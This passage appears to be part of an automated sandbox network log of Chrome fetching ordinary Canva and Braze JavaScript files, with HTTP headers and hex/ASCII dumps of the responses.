                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    117192.168.2.1249846104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC622OUTGET /web/f0398d1166314304.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:52 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 115121
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59515858874319-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1926296
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "cb1826af86c8190ceb1ff4f70e255c6d"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:38 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 23 Oct 2024 01:12:53 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 24 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: obf24c+YF9xXl/rmhD6WRszPq8SrqjFdUfGDh+41/JP3UlzybS/ZPUFJWgnDtmbusdkllCfDi2s=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: BTKRNYJWXEZQPM2Y
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 9Gmf.e8cCdjPD0iyMK2k7YgD6MdjsLKJ
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4f 38 25 32 46 53 4e 30 66 59 62 30 57 4a 69 47 62 79 6c 50 31 4a 74 39 50 65 67 4d 46 34 25 32 42 35 57 7a 72 44 73 4e 4b 6c 33 63 77 4c 30 70 41 74 4f 4f 47 6e 6e 78 41 75 63 41 78 66 25 32 46 4b 7a 4b 6e 51 63 4d 4f 49 4c 79 36 30 31 69 33 65 42 73 65 64 30 63 69 47 49 59 71 44 57 4b 55 45 4b 49 6b 38 56 6c 36 74 36 5a 75 4a 6a 78 45 74 61 4a 4e 37 4f 67 43 69 52 44 71 53 6d 4d 42 48 68 66 37 32 6e 57 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8%2FSN0fYb0WJiGbylP1Jt9PegMF4%2B5WzrDsNKl3cwL0pAtOOGnnxAucAxf%2FKzKnQcMOILy601i3eBsed0ciGIYqDWKUEKIk8Vl6t6ZuJjxEtaJN7OgCiRDqSmMBHhf72nWo%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1195INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 33 36 5d 2c 7b 38 39 39 31 37 31 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 63 6f 6e 73 74 20 73 3d 7b 54 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 65 3d 28 74 2b 22 3d 22 2e 72 65 70 65 61 74 28 28 34 2d 74 2e 6c 65 6e 67 74 68 25 34 29 25 34 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2f 22 29 2c 69 3d 61 74 6f 62 28 65 29 2c 73 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 69 2e 6c
                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 72 74 20 54 65 73 74 22 29 3b 69 66 28 65 26 26 28 65 2e 6f 6e 75 70 67 72 61 64 65 6e 65 65 64 65 64 3d 28 29 3d 3e 65 2e 72 65 73 75 6c 74 2e 63 6c 6f 73 65 28 29 2c 65 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 65 2e 72 65 73 75 6c 74 2e 63 6c 6f 73 65 28 29 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 7b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2c 65 3d 74 2e 63 68 72 6f 6d 65 7c 7c 74 2e 62 72 6f 77 73 65 72 7c 7c 74 2e 70 64 3b 69 66 28 65 26 26 65 2e 72 75 6e 74 69 6d 65 26 26 65 2e 72 75 6e 74 69 6d 65 2e 69 64 29 72 65 74 75 72 6e 20 74 68 69 73 2e 76 64 2e 69 6e 66 6f 28 22 4e 6f 74 20 75 73 69 6e 67 20 49 6e 64 65 78 65 64 44 42 20 66 6f 72 20 73 74 6f 72 61 67 65 20 62 65 63 61 75 73 65 20 77 65 20
                                                                                                                                                                                                                                                                    Data Ascii: rt Test");if(e&&(e.onupgradeneeded=()=>e.result.close(),e.onsuccess=()=>e.result.close()),"undefined"!=typeof window){const t=window,e=t.chrome||t.browser||t.pd;if(e&&e.runtime&&e.runtime.id)return this.vd.info("Not using IndexedDB for storage because we
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 73 53 75 70 70 6f 72 74 65 64 28 29 29 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 28 29 2c 21 31 3b 63 6f 6e 73 74 20 72 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 42 64 28 28 6f 3d 3e 7b 69 66 28 21 6f 2e 6f 62 6a 65 63 74 53 74 6f 72 65 4e 61 6d 65 73 2e 63 6f 6e 74 61 69 6e 73 28 74 29 29 72 65 74 75 72 6e 20 72 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 73 74 6f 72 65 20 6f 62 6a 65 63 74 20 22 2b 65 2b 22 20 69 6e 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 72 2e 64 61 74 61 62 61 73 65 2e 53 64 2b 22 20 2d 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 6f 62 6a 65 63 74 53 74 6f 72 65 22 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79
                                                                                                                                                                                                                                                                    Data Ascii: sSupported())return"function"==typeof n&&n(),!1;const r=this;return this.Bd((o=>{if(!o.objectStoreNames.contains(t))return r.vd.error("Could not store object "+e+" in "+t+" on indexedDB "+r.database.Sd+" - "+t+" is not a valid objectStore"),"function"==ty
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 26 26 69 28 29 2c 76 6f 69 64 20 6e 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 72 3d 6e 2e 74 72 61 6e 73 61 63 74 69 6f 6e 28 5b 74 5d 2c 22 72 65 61 64 6f 6e 6c 79 22 29 3b 72 2e 6f 6e 63 6f 6d 70 6c 65 74 65 3d 28 29 3d 3e 6e 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 6f 3d 72 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 74 29 2e 6f 70 65 6e 43 75 72 73 6f 72 28 6e 75 6c 6c 2c 22 70 72 65 76 22 29 3b 6f 2e 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 7b 73 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 73 2e 64 61 74 61 62 61 73 65 2e 53 64 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
                                                                                                                                                                                                                                                                    Data Ascii: function"==typeof i&&i(),void n.close();const r=n.transaction([t],"readonly");r.oncomplete=()=>n.close();const o=r.objectStore(t).openCursor(null,"prev");o.onerror=()=>{s.vd.error("Could not open cursor for "+t+" on indexedDB "+s.database.Sd),"function"==
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 69 2e 64 61 74 61 62 61 73 65 2e 53 64 29 7d 2c 6f 2e 6f 6e 73 75 63 63 65 73 73 3d 74 3d 3e 7b 76 61 72 20 69 3b 63 6f 6e 73 74 20 73 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 74 2e 74 61 72 67 65 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 72 65 73 75 6c 74 3b 6e 75 6c 6c 21 3d 73 3f 28 6e 75 6c 6c 21 3d 73 2e 76 61 6c 75 65 26 26 6e 75 6c 6c 21 3d 73 2e 6b 65 79 26 26 28 72 2e 64 65 6c 65 74 65 28 73 2e 6b 65 79 29 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 7b 61 2e 70 75 73 68 28 73 2e 76 61 6c 75 65 29 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 63 6f 6e 74 69 6e 75 65 26 26 73 2e
                                                                                                                                                                                                                                                                    Data Ascii: not open cursor for "+t+" on indexedDB "+i.database.Sd)},o.onsuccess=t=>{var i;const s=null===(i=t.target)||void 0===i?void 0:i.result;null!=s?(null!=s.value&&null!=s.key&&(r.delete(s.key).onsuccess=()=>{a.push(s.value)}),"function"==typeof s.continue&&s.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 67 6c 65 4c 6f 67 67 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 69 6e 69 74 28 29 2c 73 2e 7a 67 3f 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 44 69 73 61 62 6c 69 6e 67 20 42 72 61 7a 65 20 6c 6f 67 67 69 6e 67 22 29 2c 73 2e 7a 67 3d 21 31 29 3a 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 45 6e 61 62 6c 65 64 20 42 72 61 7a 65 20 6c 6f 67 67 69 6e 67 22 29 2c 73 2e 7a 67 3d 21 30 29 7d 2c 69 6e 66 6f 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61 7a 65 3a 20 22 2b 74 3b 6e 75 6c 6c 21 3d 73 2e 76 64 3f 73 2e 76 64 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 7d 2c 77 61 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61 7a 65
                                                                                                                                                                                                                                                                    Data Ascii: gleLogging:function(){s.init(),s.zg?(console.log("Disabling Braze logging"),s.zg=!1):(console.log("Enabled Braze logging"),s.zg=!0)},info:function(t){if(s.zg){const e="Braze: "+t;null!=s.vd?s.vd(e):console.log(e)}},warn:function(t){if(s.zg){const e="Braze
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 2e 45 29 28 74 29 3e 6f 2e 5a 2e 6c 72 29 72 65 74 75 72 6e 20 76 6f 69 64 20 72 2e 5a 2e 65 72 72 6f 72 28 60 52 65 6a 65 63 74 65 64 20 75 73 65 72 20 69 64 20 22 24 7b 74 7d 22 20 62 65 63 61 75 73 65 20 69 74 20 69 73 20 6c 6f 6e 67 65 72 20 74 68 61 6e 20 24 7b 6f 2e 5a 2e 6c 72 7d 20 62 79 74 65 73 2e 60 29 3b 69 66 28 6e 75 6c 6c 21 3d 65 26 26 21 28 30 2c 61 2e 72 6f 29 28 65 2c 22 73 65 74 20 73 69 67 6e 61 74 75 72 65 20 66 6f 72 20 6e 65 77 20 75 73 65 72 22 2c 22 73 69 67 6e 61 74 75 72 65 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 69 3d 73 2e 5a 50 2e 63 72 28 29 3b 69 26 26 69 2e 63 68 61 6e 67 65 55 73 65 72 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 2c 73 2e 5a 50 2e 67 72 28 29 2c 65 29 7d 7d 2c 31 39 35 30 38 38 3a 28 74 2c 65 2c 69 29
                                                                                                                                                                                                                                                                    Data Ascii: .E)(t)>o.Z.lr)return void r.Z.error(`Rejected user id "${t}" because it is longer than ${o.Z.lr} bytes.`);if(null!=e&&!(0,a.ro)(e,"set signature for new user","signature"))return;const i=s.ZP.cr();i&&i.changeUser(t.toString(),s.ZP.gr(),e)}},195088:(t,e,i)
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 63 6f 6e 73 74 20 74 3d 73 2e 5a 50 2e 6c 28 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 76 6f 69 64 20 72 2e 5a 2e 77 61 72 6e 28 61 2e 47 6f 29 3b 74 2e 63 6c 65 61 72 44 61 74 61 28 29 3b 63 6f 6e 73 74 20 65 3d 28 30 2c 6e 2e 58 50 29 28 6f 2e 5a 2e 59 74 29 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 65 5b 69 5d 2c 73 3d 6f 2e 5a 2e 59 74 5b 74 5d 3b 6e 65 77 20 6f 2e 5a 28 73 2c 72 2e 5a 29 2e 63 6c 65 61 72 44 61 74 61 28 29 7d 69 66 28 73 2e 5a 50 2e 58 28 29 29 66 6f 72 28 63 6f 6e 73 74 20 69 20 6f 66 20 73 2e 5a 50 2e 67 72 28 29 29 69 2e 63 6c 65 61 72 44 61 74 61 28 21 30 29 7d 7d 2c 38 34 32 34 31 37 3a 28 74 2c 65 2c
                                                                                                                                                                                                                                                                    Data Ascii: ;function u(){const t=s.ZP.l();if(null==t)return void r.Z.warn(a.Go);t.clearData();const e=(0,n.XP)(o.Z.Yt);for(let i=0;i<e.length;i++){const t=e[i],s=o.Z.Yt[t];new o.Z(s,r.Z).clearData()}if(s.ZP.X())for(const i of s.ZP.gr())i.clearData(!0)}},842417:(t,e,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 74 68 69 73 2e 4e 65 2c 22 64 61 74 65 74 69 6d 65 22 29 7d 59 28 29 7b 63 6f 6e 73 74 20 74 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 2e 74 74 2e 68 74 5d 3d 74 68 69 73 2e 69 64 2c 74 5b 6e 2e 74 74 2e 6c 65 5d 3d 74 68 69 73 2e 65 6e 61 62 6c 65 64 2c 74 5b 6e 2e 74 74 2e 70 65 5d 3d 74 68 69 73 2e 70 72 6f 70 65 72 74 69 65 73 2c 74 5b 6e 2e 74 74 2e 46 65 5d 3d 74 68 69 73 2e 74 72 61 63 6b 69 6e 67 53 74 72 69 6e 67 2c 74 7d 50 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 50 72 6f 70 65 72 74 79 20 69 73 20 6e 6f 74 20 6f 66 20 74 79 70 65 20 24 7b 74 7d 2e 60 29 7d 79 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 24 7b 74 7d 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 66 65 61 74 75 72 65 20 66 6c 61 67 20 70 72 6f 70 65 72 74 69 65 73 2e 60 29 7d 62
                                                                                                                                                                                                                                                                    Data Ascii: this.Ne,"datetime")}Y(){const t={};return t[n.tt.ht]=this.id,t[n.tt.le]=this.enabled,t[n.tt.pe]=this.properties,t[n.tt.Fe]=this.trackingString,t}Pe(t){s.Z.info(`Property is not of type ${t}.`)}ye(t){s.Z.info(`${t} not found in feature flag properties.`)}b


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    118192.168.2.1249848104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC1249OUTGET /web/ec8d2419e931aebd.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:52 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59515969e042e9-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1572080
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "c0b2a76c1e93f5e6f8456bb938d2d403"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:38 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 30 Oct 2024 03:11:30 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 31 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: t4t2ujnBj3IKXvL4IhkijJEZhFOWYVHFppdmQGcd8WjqPZJ/QO3eiCHHkCpFJldwLpJSg5ecOaa1v6CBlb5R8S8li+o/OLco5mH7Wc+1oEc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 4AV0EXZAAZAZ4ST0
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: chdQbFcdc5krOHeQLPzxUbMY3CJ4I85P
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC346INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 30 6d 71 56 78 70 72 52 75 73 66 35 46 74 76 30 4f 68 50 77 45 59 79 6d 35 31 31 77 49 4d 76 73 78 73 5a 44 30 4b 6f 45 7a 71 30 34 50 53 65 37 46 44 6d 4f 71 5a 73 61 33 67 4a 25 32 46 76 74 35 30 74 66 38 70 32 78 34 38 69 70 4b 41 52 53 67 4b 6b 63 38 64 44 45 39 63 42 49 36 53 6e 73 43 59 71 31 6a 55 4b 77 61 38 36 4b 61 66 61 32 5a 6a 66 70 4d 4b 53 47 55 37 4e 6d 72 78 66 79 76 78 51 50 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mqVxprRusf5Ftv0OhPwEYym511wIMvsxsZD0KoEzq04PSe7FDmOqZsa3gJ%2Fvt50tf8p2x48ipKARSgKkc8dDE9cBI6SnsCYq1jUKwa86Kafa2ZjfpMKSGU7NmrxfyvxQPU%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC411INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 34 31 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 34 30 32 32 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2141],{/***/ 240224:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    119192.168.2.1249847104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC852OUTGET /chunk-batch/3e1e05ba24ee6f70.js+6d0e69feb99e4a90.js+60f63b285a3b4847.js+b2bb61a849e48145.js+c8a97d58e80df6e6.js+b68cf68769865eb5.js+edabeea6215279ba.js+131eb4392c201a0d.js+217c7ff3fe127f37.js+c2b308fb492f8999.js+bd755f9837164721.js+896e1adda18e46a3.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
